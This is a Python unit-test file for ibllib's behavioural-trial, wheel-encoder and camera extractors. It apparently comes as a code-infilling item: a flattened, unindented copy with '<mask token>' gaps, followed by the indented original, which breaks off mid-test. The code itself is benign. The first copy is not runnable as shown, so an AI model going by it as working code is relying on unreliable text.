self.assertEqual(ft.size, self.biased_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
def test_get_contrastLR(self):
cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
<mask token>
def test_get_choice(self):
choice = training_trials.Choice(session_path=self.training_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = training_trials.Choice(session_path=self.training_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
def test_get_rewardVolume(self):
rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
def test_get_stimOn_times_lt5(self):
st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
def test_get_stimOn_times_ge5(self):
st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
def test_stimOnOffFreeze_times(self):
st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
def test_get_intervals(self):
di = training_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = training_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
def test_get_goCueTrigger_times(self):
data = raw.load_data(self.training_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps'][
'closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(gct, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps'][
'closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(gct, np.ndarray))
def test_get_goCueOnset_times(self):
gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
def test_get_included_trials_lt5(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials_ge5(self):
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(self.training_lt5['path'], settings
={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',
str(ex.exception))
out, files = training_trials.extract_all(self.training_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'
) as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = {}, []
out, files = biased_trials.extract_all(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
out, files = biased_trials.extract_all(self.biased_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
path = self.training_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,
1853979, 1859144])
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
path = self.biased_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
path = self.biased_ge5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
def test_load_encoder_events(self):
raw.load_encoder_events(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.training_ge5['path'])
raw.load_encoder_events(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.biased_ge5['path'])
<mask token>
def tearDown(self):
for f in self.main_path.rglob('_ibl_log.*.log'):
f.unlink()
[x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.
is_file()]
[x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.
is_file()]
[x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.
is_file()]
[x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.
is_file()]
[x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.
is_dir()]
[x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()
]
[x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.
is_dir()]
[x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()
]
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
drift_pol = np.array([11 * 1e-06, -20])
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + 0.001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) ->None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtracor(BaseExtractor):
save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',
'some_file.npy')
var_names = 'csv', 'ssv', 'tsv', 'npy'
def _extract(self, **kwargs) ->tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return csv, ssv, tsv, npy
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) ->None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
self.mock_extractor = MockExtracor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
ts += np.full_like(ts, 0.0001).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.0
audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[
'polarities']}
for p in range(n_pulses):
i = p * 2
rise = pulse_width * p + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
self.assertEqual(audio, audio_, "Audio dict shouldn't be effected")
np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667,
40.033333, 40.05])
delay = 0.08
pulse_width = 1e-05
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t +
pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff
=0.005)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,
tolerance=0.1, min_diff=0.005)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))
def test_attribute_times(self, display=False):
tsa = np.linspace(0, 60, 60 * 4)[:60]
tsb = np.linspace(0, 60, 60 * 3)[:45]
tsa = np.sort(np.append(tsa, 0.4))
tsb = np.sort(np.append(tsb, 0.41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
matches = camera.attribute_times(tsa, tsb)
expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23,
25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,
49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
matches = camera.attribute_times(tsa, tsb, injective=False, take=
'nearest')
expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
<mask token>
| import functools
import shutil
import tempfile
import unittest
import unittest.mock
from pathlib import Path
import numpy as np
import pandas as pd
import one.alf.io as alfio
from ibllib.io.extractors import training_trials, biased_trials, camera
from ibllib.io import raw_data_loaders as raw
from ibllib.io.extractors.base import BaseExtractor
def wheelMoves_fixture(func):
"""Decorator to save some dummy wheelMoves ALF files for extraction tests"""
@functools.wraps(func)
def wrapper(obj=None):
# Save some wheelMoves ALF files
attr_list = ['training_lt5',
'training_ge5',
'biased_lt5',
'biased_ge5']
alf_paths = [getattr(obj, p)['path'] / 'alf' for p in attr_list]
n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]
for p, n in zip(alf_paths, n_trials):
p.mkdir()
np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))
np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))
# Run method
func(obj)
# Teardown; delete the files
for p in alf_paths:
shutil.rmtree(p)
return wrapper
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' / 'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' / 'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' / 'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' / 'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5['path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path']))
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5['path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path']))
# turn off logging for unit testing as we will purposedly go into warning/error cases
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
# Save some dummy wheel moves data for trial firstMovement_times extraction
def test_get_feedbackType(self):
# TRAINING SESSIONS
ft = training_trials.FeedbackType(
self.training_lt5['path']).extract()[0]
self.assertEqual(ft.size, self.training_lt5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
# -- version >= 5.0.0
ft = training_trials.FeedbackType(
self.training_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.training_ge5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
# BIASED SESSIONS
ft = biased_trials.FeedbackType(
self.biased_lt5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_lt5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
# -- version >= 5.0.0
ft = biased_trials.FeedbackType(
self.biased_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_ge5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
def test_get_contrastLR(self):
# TRAINING SESSIONS
cl, cr = training_trials.ContrastLR(
self.training_lt5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
# -- version >= 5.0.0
cl, cr = training_trials.ContrastLR(
self.training_ge5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
# BIASED SESSIONS
cl, cr = biased_trials.ContrastLR(
self.biased_lt5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
# -- version >= 5.0.0
cl, cr = biased_trials.ContrastLR(
self.biased_ge5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
def test_get_probabilityLeft(self):
# TRAINING SESSIONS
pl = training_trials.ProbabilityLeft(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
# -- version >= 5.0.0
pl = training_trials.ProbabilityLeft(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
# BIASED SESSIONS
pl = biased_trials.ProbabilityLeft(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
# Test if only probs that are in prob set
md = raw.load_settings(self.biased_lt5['path'])
if md:
probs = md['BLOCK_PROBABILITY_SET']
probs.append(0.5)
self.assertTrue(sum([x in probs for x in pl]) == len(pl))
# -- version >= 5.0.0
pl = biased_trials.ProbabilityLeft(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
# Test if only probs that are in prob set
md = raw.load_settings(self.biased_ge5['path'])
probs = md['BLOCK_PROBABILITY_SET']
probs.append(0.5)
self.assertTrue(sum([x in probs for x in pl]) == len(pl))
def test_get_choice(self):
# TRAINING SESSIONS
choice = training_trials.Choice(
session_path=self.training_lt5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
# -- version >= 5.0.0
choice = training_trials.Choice(
session_path=self.training_ge5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
# BIASED SESSIONS
choice = biased_trials.Choice(
session_path=self.biased_lt5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
# -- version >= 5.0.0
choice = biased_trials.Choice(
session_path=self.biased_ge5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
# TODO: Test its sawtooth
# TRAINING SESSIONS
rn = training_trials.RepNum(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
# -- version >= 5.0.0
rn = training_trials.RepNum(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
# BIASED SESSIONS have no repeted trials
def test_get_rewardVolume(self):
# TRAINING SESSIONS
rv = training_trials.RewardVolume(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
# -- version >= 5.0.0
rv = training_trials.RewardVolume(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
# BIASED SESSIONS
rv = biased_trials.RewardVolume(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
# Test if all non zero rewards are of the same value
self.assertTrue(all([x == max(rv) for x in rv if x != 0]))
# -- version >= 5.0.0
rv = biased_trials.RewardVolume(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
# Test if all non zero rewards are of the same value
self.assertTrue(all([x == max(rv) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
# TRAINING SESSIONS
ft = training_trials.FeedbackTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
# BIASED SESSIONS
ft = biased_trials.FeedbackTimes(
self.biased_ge5['path']).extract()[0]
